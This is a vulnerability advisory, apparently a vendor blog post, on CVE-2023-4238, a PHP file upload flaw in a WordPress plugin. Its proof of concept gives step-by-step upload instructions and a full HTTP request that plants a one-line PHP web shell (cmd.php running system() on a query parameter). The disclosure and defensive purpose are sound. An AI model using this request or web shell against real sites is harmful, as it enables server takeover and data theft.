CVE-2023-4238 – Prevent files / folders access < 2.5.2 - Remote Code Execution

,

A severe security loophole has come to light in the Prevent files / folders access plugin, triggering concerns over the safety of WordPress websites. This vulnerability, tracked as CVE-2023-4238, opens the door to remote code execution through file uploads. Our testing revealed a startling scenario: an attacker can potentially upload a PHP file to the private directory at /wordpress/wp-admin/admin.php?page=mo_media_restrict&tab=private_directory.

The plugin’s inclusion of a function for privilege elevation is noteworthy. If an attacker obtains < Admin privileges, they could exploit ordinary users to facilitate this unauthorized upload.

Main info:

CVECVE-2023-4238
PluginPrevent files / folders access
CriticalVery High
Publicly PublishedAugust 31, 2023
Last UpdatedAugust 31, 2023
ResearcherDmtirii Ignatyev
OWASP TOP-10A05: Security Misconfiguration
PoCYes
ExploitWill be later
Reference https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4238
https://wpscan.com/vulnerability/53816136-4b1a-4b7d-b73b-08a90c2a638f
Plugin Security Certification by CleanTalk

Timeline

July 13, 2023Plugin testing and vulnerability detection in the Prevent files / folders access plugin have been completed
July 13, 2023I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing
August 27, 2023The author has released a fix update
August 31, 2023Registered CVE-2023-4238

Discovery of the Vulnerability

During our meticulous examination of the plugin, we identified a critical flaw that exposes websites to remote code execution. This vulnerability allows an attacker to upload malicious PHP files to a specific directory, providing a gateway for executing arbitrary commands on the target system.

Understanding of Remote Code Execution attack’s

Remote Code Execution (RCE) is a sophisticated cyber attack that poses significant threats to the security of software applications, web servers, and online platforms. This type of attack enables malicious actors to execute arbitrary code on a target system, often leading to a complete compromise of the system’s functionality and data.

How Remote Code Execution Works:

  1. Vulnerability Exploitation: RCE attacks typically exploit vulnerabilities in an application’s code, often resulting from poor input validation, inadequate user authentication, or insecure configurations. Attackers seek ways to inject their own malicious code into the target system.
  2. Command Execution: Once the attacker succeeds in injecting malicious code, they can execute arbitrary commands on the target system. These commands might include shell commands, operating system functions, or other actions that can compromise the system’s security.
  3. Unauthorized Access: RCE allows attackers to gain unauthorized access to the server environment, enabling them to manipulate files, databases, and other resources. This unauthorized access can result in data breaches, data loss, and unauthorized control of the system.

Exploiting the Remote Code Execution

In the context of the Prevent files / folders access plugin, an attacker can exploit the lack of proper validation and restrictions on file uploads. By injecting malicious PHP code into a file, they can upload it to the private directory. Upon execution, this file can trigger unauthorized commands, thereby compromising the entire web application.

POC:

1) Need to go to /wordpress/wp-admin/admin.php?page=mo_media_restrict&tab=private_directory

2) Then upload a file with the php extension

3) Follow the link http://your_host/wordpress/wp-content/uploads/protectedfiles/{filename}.php

POC request:

POST /wordpress/wp-admin/admin.php?page=mo_media_restrict&tab=private_directory HTTP/1.1

Host: your_host

User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:102.0) Gecko/20100101 Firefox/102.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://your_host/wordpress/wp-admin/admin.php?page=mo_media_restrict&tab=private_directory

Content-Type: multipart/form-data; boundary=—————————1997636327839669212858654260

Content-Length: 748

Origin: http://your_host

Connection: close

Cookie: wordpress_5bd7a9c61cda6e66fc921a05bc80ee93=forgen%7C1689481588%7Cyy6JhGzsFzCgNGZrPBtXmLggeJYWnERQGSgti68YGZK%7C778d0436fcf72095251ba6a1f0020fe28af9d706771d93c24bc4fdd5e96ab3c0; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_5bd7a9c61cda6e66fc921a05bc80ee93=forgen%7C1689481588%7Cyy6JhGzsFzCgNGZrPBtXmLggeJYWnERQGSgti68YGZK%7C5b4086f33c562500a9c62e1028af758fe8630a9991847cf93ff7a1265c9d9777; wp-settings-1=libraryContent%3Dbrowse%26siteorigin_panels_setting_tab%3Dwelcome; wp-settings-time-1=1689308788

Upgrade-Insecure-Requests: 1

Sec-Fetch-Dest: document

Sec-Fetch-Mode: navigate

Sec-Fetch-Site: same-origin

Sec-Fetch-User: ?1

—————————–1997636327839669212858654260

Content-Disposition: form-data; name=”mo_media_restriction_file_upload_field”

cff450153b

—————————–1997636327839669212858654260

Content-Disposition: form-data; name=”_wp_http_referer”

/wordpress/wp-admin/admin.php?page=mo_media_restrict&tab=private_directory

—————————–1997636327839669212858654260

Content-Disposition: form-data; name=”fileToUpload”; filename=”cmd.php”

Content-Type: application/x-php

<?php system($_GET[‘cmd’]); ?>

—————————–1997636327839669212858654260

Content-Disposition: form-data; name=”option”

mo_media_restriction_file_upload

—————————–1997636327839669212858654260–

Potential Risks and Real-World Impact

The gravity of this vulnerability cannot be understated. An attacker who successfully leverages this RCE vulnerability gains the ability to execute operating system commands, potentially leading to the complete compromise of the web application, data theft, and unauthorized control of the server environment.

  1. Data Breaches: Attackers can exfiltrate sensitive data from compromised systems. This might include personal information, financial data, proprietary business information, and more.
  2. System Compromise: RCE attacks can lead to complete control of the target system. Attackers can modify files, install malware, and even escalate their privileges to gain control over the entire server.
  3. Malicious Payload: Attackers can deliver payloads that create backdoors or install malware, allowing them to maintain persistent access to the compromised system even after the initial attack.

Recommendations for Improved Security

To mitigate the risks associated with CVE-2023-4238 and enhance overall security, we strongly recommend the following measures:

  1. Regular Updates: Keeping software, applications, and plugins up to date helps patch known vulnerabilities that attackers could exploit for RCE.
  2. Input Validation: Thoroughly validate and sanitize all user inputs to prevent injection attacks and unauthorized code execution.
  3. Secure Coding Practices: Developers should follow secure coding practices, use proper input validation, avoid executing user-supplied code, and implement principle of least privilege.
  4. Web Application Firewalls (WAFs) and Security Plugins: Implementing WAFs or Security Plugins can help detect and prevent RCE attempts by filtering malicious inputs. You can use a very powerful and multifunctional Security & Malware scan by CleanTalk, which will protect your site from such attacks and your site will always be readable
  5. User Education: Educate users about the risks of executing code from untrusted sources and encourage them to avoid opening suspicious emails or downloading files from unknown sources.

By addressing the RCE vulnerability in the Prevent files / folders access plugin and following these security recommendations, website owners can significantly reduce the likelihood of security breaches and protect the integrity of their web applications.

#WordPressSecurity #RemoteCodeExecution #WebsiteSafety #StayProtected #VeryCriticalVulnerability

Use CleanTalk solutions to improve the security of your website

Dmitrii i.

If you think your website is infected and you need help, contact us for malware cleanup. Our specialists will provide you with professional assistance in cleaning your website from malware.


Check my website

Comments

Leave a Reply

Your email address will not be published. Required fields are marked *